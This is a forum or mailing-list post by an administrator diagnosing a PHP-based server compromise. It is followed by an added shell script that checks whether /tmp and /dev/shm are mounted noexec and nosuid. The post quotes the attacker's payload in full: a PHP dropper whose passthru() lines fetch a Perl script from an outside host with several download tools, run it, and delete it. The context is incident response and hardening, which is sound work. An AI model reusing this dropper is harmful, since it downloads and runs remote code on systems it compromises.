
Re: ping22: can not kill this process



Hi folks,
I found the issue: it is one of the PHP scripts allowing the remote script to run,
and the remote script is something like:

<?php
 passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /tmp;curl -o bb.txt http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /tmp;lwp-download http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /tmp;lynx -source http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /tmp;fetch http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /tmp;GET http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /dev/shm;wget http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /dev/shm;curl -o bb.txt http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /dev/shm;lwp-download http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /dev/shm;lynx -source http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /dev/shm;fetch http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
 passthru('id');
?>

The /tmp was mounted as rw,noexec,nosuid, so it cannot run.

But /dev/shm was not, so the hacked script was downloaded to /dev/shm and run from there.


What kind of applications are using /dev/shm? I googled around, but cannot seem to find much information.
Right now I mount it as rw,noexec,nosuid.



Best Regards

Mike
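
Added example, not part of Mike's message: a shell check for the fix he describes, reporting whether /tmp and /dev/shm carry noexec and nosuid. The mounts table embedded in it is constructed to match the situation in the post, and the function names are this example's own.

```shell
#!/bin/sh
# Added example: flag scratch mounts that lack the options used in the post.
REQUIRED_OPTS="noexec nosuid"
SCRATCH_DIRS="/tmp /dev/shm"

# Constructed sample in /proc/mounts format, mirroring the post: /tmp hardened, /dev/shm not.
sample_mounts() {
    cat <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid 0 0
tmpfs /dev/shm tmpfs rw 0 0
EOF
}

# missing_opts <comma-separated-options>: print the required options that are absent.
missing_opts() {
    miss=""
    for want in $REQUIRED_OPTS; do
        case ",$1," in
            *",$want,"*) ;;
            *) miss="$miss $want" ;;
        esac
    done
    echo "${miss# }"
}

# audit_mounts: read a mounts table on stdin; return 1 if any scratch dir is weak.
audit_mounts() {
    table=$(cat)
    rc=0
    for dir in $SCRATCH_DIRS; do
        # The last entry for a path wins, since later mounts shadow earlier ones.
        opts=$(printf '%s\n' "$table" | awk -v d="$dir" '$2 == d { o = $4 } END { print o }')
        miss=$(missing_opts "$opts")
        if [ -z "$opts" ]; then
            echo "$dir: no separate mount, options come from the parent filesystem"; rc=1
        elif [ -n "$miss" ]; then
            echo "$dir: missing $miss (has $opts)"; rc=1
        else
            echo "$dir: ok ($opts)"
        fi
    done
    return $rc
}

sample_mounts | audit_mounts || true   # on a real host: audit_mounts < /proc/mounts
```

noexec only blocks direct execution of files on the mount; an interpreter started from elsewhere can still read a script stored there, so pair this check with fixing the PHP script that let the remote script run.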